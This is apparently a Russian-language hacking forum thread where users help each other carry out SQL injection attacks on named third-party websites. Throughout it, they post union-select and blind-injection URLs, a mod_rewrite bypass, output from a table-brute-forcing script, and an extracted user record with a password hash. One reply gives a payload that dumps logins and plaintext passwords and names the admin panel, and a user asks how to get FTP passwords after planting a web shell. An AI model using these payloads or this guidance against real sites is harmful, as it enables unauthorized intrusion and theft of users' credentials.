Кто-нибудь знает как можно обойти mod_rewrite для проведения sql-иньекций? А то он надоел уже, оч часто попадается
вот сайт про медведа...... там уязвимых переменных много.. но неодну не вышло разкрутить.. толи я спать хочу толи еще чтот ) кароч. смотрите... и еще хотел спросить.... если я залиш шелл. и у меня есть возможность просматривать все что до и после /home , как узнать пароль от ФТП ?
"Кто-нибудь знает как можно обойти mod_rewrite для проведения sql-иньекций? А то он надоел уже, оч часто попадается" совет: для начала почитай про mod_rewrite, как он вообще работает и "взаимодействует" со скриптами и тд. а ответ: пример, ссыль http://www.site.ru/index-edit-3.htm или немного в другом виде http://www.site.ru/index/edit/3 оригинал урл предположительно выглядит так http://www.site.ru/index.php?action=edit&id=3, вот и проводи инъекцию http://www.site.ru/index-edit-3+group+by+100/*.htm и тд
Если админ не хранит их в текстовике memory.txt D), то только надеяца, что пассы от бд или ещё чего-нибудь совпадут с фтп.
Подскажите какие таблицы можно использовать еще, если при таком запросе: http://site.ru/index.php?id=-3+union+select+version(),2,3+from+infomation_schema.tables-- вылазит: SELECT command denied to user: 'user@host' for table 'table' ?
Использовать те таблицы, к которым имеет доступ юзер под которым ты подключен к бд к INFORMATION_SCHEMA доступа нет пробуй вручную перебирать или посредством скриптов.
народ подскажите вот с этим http://www.irintech.com/x1/blogarchive.php?id=-764+union+select+1,2,3,4,5,6,7,8/* вроде полей по order by 8 а так че то ошибку выдает че за х? и таких блин куча обьясните раз и на всегда
Объясняю раз и на всегда: В запросе скорее всего 2 селекта почитай это : http://forum.antichat.ru/threadnav43966-3-10.html
Прочитать про посимвольный перебор, а так же про подзапросы (да и про многое другое) можно здесь: https://forum.antichat.ru/threadnav43966-1-10.html Code: http://www.irintech.com/x1/blogarchive.php?id=764+and+1=1 - запрос выполняется правильно, результат запроса не меняется http://www.irintech.com/x1/blogarchive.php?id=764+and+1=2 - запрос выполняется не правильно, результат запроса меняется Таким образом посимвольно выводи нужную тебе информацию (для начала нужно вывести версию, т.к. подзапросы доступны начиная с версии 4.1), только делать это руками не рационально, лучше скриптом или программой: Code: version(): 4.1.11-Debian_4sarge7 user(): [email protected] database(): db35109_x1 Т.к. версия БД => 4.1 то использовать подзапросы можно: Code: http://www.irintech.com/x1/blogarchive.php?id=764+and+(select+1)=1 - это уже пример подзапроса Дальше тебе нужно брутить таблицы, могу попробывать если хочешь (т.к. я сейчас занимаюсь тестированием своего скрипта, который как раз работает со слепыми инъекциями), если найдутся какие либо (займет поиск часа 2-3), то добавлю инфу в этот же пост. А вот и найденые таблицы: Code: Имена таблиц взяты из файла: lib_and_data/grey_table_name.txt Всего: 1559 имён таблиц Найдено таблиц: 2 admin user Колонки к таблице admin: Code: Подбор имён колонок к таблице: admin Найдено колонок: 1 id Колонки к таблице user: Code: Подбор имён колонок к таблице: user Найдено колонок: 4 id username email password Жаль что колонки к таблице с админами не сбрутились, надо будет мне состряпать словарь с именами колонок, а то того что юзаю я пока не хватает. Вывел данные из таблиц, может пригодится: Code: Вывод результата запроса: (select id from admin limit 0,1) length((select id from admin limit 0,1)): 1 (select id from admin limit 0,1): 1 Code: Вывод результата запроса: (select concat(id,char(58),email,char(58),username,char(58),password) from user limit 0,1) length((select concat(id,char(58),email,char(58),username,char(58),password) from user limit 0,1)): 45 (select concat(id,char(58),email,char(58),username,char(58),password) from user limit 0,1): 35:jean:jean:3308150413ecf9da841f9a9dd90309ba
а хера его обходить. Ведь меняется только текст в урле. Вот тебе Яркий пример: https://forum.antichat.ru/showthread.php?t=27498 и https://forum.antichat.ru/thread27498.html одно и тоже (обязательно прочти статью по этим линкам) Единственное, что сложно подбирать правильный урл. Другого способа, отличного от подбора не знаю. Впринципе особо не интересовался. Погугли, может найдёшь что-нить. А если найдёшь, то скинь в личку ссылок =)
привет. я только учусь =) нашол SQL на http://www.aquarell-sts.ru/products/index.php?id=50' подобрал количество: http://www.aquarell-sts.ru/products/index.php?id=-1+union+select+1,2,3/* - вот, вроде, 3 =) также могу подставить вместо 2 например user(), database(), etc.. НО пробую так: http://www.aquarell-sts.ru/products/index.php?id=50+union+select+1,user(),3+from+mysql.user/* в ответ: SELECT command denied to user 'a2513_aquarell'@'lbarbero-15.m-10.ru' for table 'user' типа команда SELECT для юзера a2513_aquarell ЗАпрещена =( что мне делать? =*)
таблици искать перебором? http://www.aquarell-sts.ru/products/index.php?id=50+union+select+1,user(),3+from+table/* и table перебереть брутом?
http://www.aquarell-sts.ru/products/index.php?id=-1+union+select+111,222,333+from+users/* подходит =)
Code: http://www.aquarell-sts.ru/products/index.php?id=-1+union+select+111,concat(login,0x3a,pwd),333+from+users/* Пароли в открытом виде, админка: http://www.aquarell-sts.ru/admin/
Ded MustD!e: СПАСИБО!!!!!!!!!!!!!!!!!!!!!!!!!!!!! а если не секрет мож мне россказать как ти узнал про login и pwd?
http://www.mbc.edu - сайт /news/r_detail.asp?id=2087+union+select+1,2,3,4,5,6,7/* - точное кол-во. Но вывод куда-то пропал . Нигде нету. Это blind injection ?